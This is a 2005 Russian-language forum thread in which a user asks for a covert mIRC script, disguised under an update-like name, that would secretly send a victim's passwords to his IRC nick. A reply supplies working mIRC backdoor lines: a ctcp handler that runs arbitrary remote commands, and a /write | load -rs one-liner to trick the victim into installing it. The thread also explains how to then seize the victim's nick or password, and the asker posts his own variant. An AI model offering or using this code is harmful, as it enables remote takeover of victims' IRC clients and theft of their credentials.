Скрипт шпион

Discussion in 'Безопасность и Анонимность' started by Melkiy, 15 Jun 2005.

  1. Melkiy

    Melkiy New Member

    Joined:
    15 Jun 2005
    Messages:
    4
    Likes Received:
    0
    Reputations:
    0
    Нужен скрипт, который будет высылать на указанный ник в ирк сети все пороли вводимые либо с помощью автозагрузки либо вручную... нада что бы отсылались беспалева, тоесть что бы не открывалось окно привата у "жертвы". Больше от скрипта ничего не требуется... и самое главное его бональное название какой нитть там апдейт... типа копируешь в папку с мирк, прописуешь лоуд такой то скрипт и все... если реально помогите... с дургом пообщались говорит скрипт стро в 20 выедет... не больше... а как конкретна незнаем...

    Всем заранее спасиба...
     
  2. Rebz

    Rebz Banned

    Joined:
    8 Nov 2004
    Messages:
    4,052
    Likes Received:
    1,534
    Reputations:
    1,128
    Если в строк 20 сам возьми И НАПИШИ ЕГО!!
    А как конкретно не знаете, говоришь?? Думаешь здесь одни знайки собрались, ДА???? А вот и нехрена!! берите вы со своим другом мануал и читайте,читайте,читайте!!!!

    И не обращайся с такими вопросами СЮДА!!! Достали!!
     
    #2 Rebz, 15 Jun 2005
    Last edited: 15 Jun 2005
  3. Melkiy

    Melkiy New Member

    Joined:
    15 Jun 2005
    Messages:
    4
    Likes Received:
    0
    Reputations:
    0
    Ну а чо незнайки чтолли собрались??? Вообще нахрена нужен этот фопрум если у вас просят помощи, а вы в ответ возьмите и сами сделайте... что касается смануала, с радостью почитал бы и изучил бы... если бы ты был настолько любезен и кинул бы мне мануал где написано какая команда или какой символ или как там что делает я бы был очень рад...
     
  4. m0nzt3r

    m0nzt3r моня

    Joined:
    22 Jun 2004
    Messages:
    2,096
    Likes Received:
    673
    Reputations:
    591
    ну вот приехали...а для чего ХЕЛП в самом Мирке?? пишешь /help /komanda или просто /help
    Есть 2 рабочих способа..(а может быть и много..).1)пишешь таку строчку в любой файл(это может быть и картинка и тхт и т.д)
    Code:
    ctcp 1:*:?:$1-
    и потом сохраняешь...дальше надо сделать так чтоб жертва загрузила этот файл командой
    Code:
    /load -rs имя_файла_где_код.его_формат
    или социальной инженерией заставить его записать такую строчку
    Code:
    /write какой_нибудь_файл.любой_формат ctcp 1:*:?:$1- | load -rs имя_того_же_файла
    и все..Если он сделает напишет какието их этих команд то дальше делаешь так: пишешь в ирке
    Code:
    /ctcp ник_жертвы /любая_команда
    можно нпример изменить ник или пасс ))) или написать комуто в приват или на канал))) теперь второй способ 2)Я точно скрипт не помню но на компе жертвы надо было написать 2-3 строчки которые ждали чтоб ктото набрал идент и потом отсылал идент в виде мемо на твой ник )) если вспомню то выложу
     
    #4 m0nzt3r, 15 Jun 2005
    Last edited: 15 Jun 2005
  5. Melkiy

    Melkiy New Member

    Joined:
    15 Jun 2005
    Messages:
    4
    Likes Received:
    0
    Reputations:
    0
    Что касается первого втоего способа где имеешь власть над мирк жерты я себе каманду писал она выглядела так: //write ml ctcp *:Mel*:{ if ($nick == Melkiy) $ $+ 2- } | .load -rs ml, но мне ни это нужно, мне нада узнать пароли на все, что находится в автозагрузке... ты понял о чом я говорю, если найдешь вылажи обязательно....
     
  6. m0nzt3r

    m0nzt3r моня

    Joined:
    22 Jun 2004
    Messages:
    2,096
    Likes Received:
    673
    Reputations:
    591
    читай здесь на главной странице статью про ирк...там написано также как расшарить С: жертвы)) а дальше уже можно поиметь пассы.а что касается пароля от ника то его тоже можно сменить командой ))
     
  7. Melkiy

    Melkiy New Member

    Joined:
    15 Jun 2005
    Messages:
    4
    Likes Received:
    0
    Reputations:
    0
    Все никак тебя в аське не застану...
     
  8. m0nzt3r

    m0nzt3r моня

    Joined:
    22 Jun 2004
    Messages:
    2,096
    Likes Received:
    673
    Reputations:
    591
    ничего)) тебе что надо можешь и здесь написать...или в аську напиши если даже буду оффлайн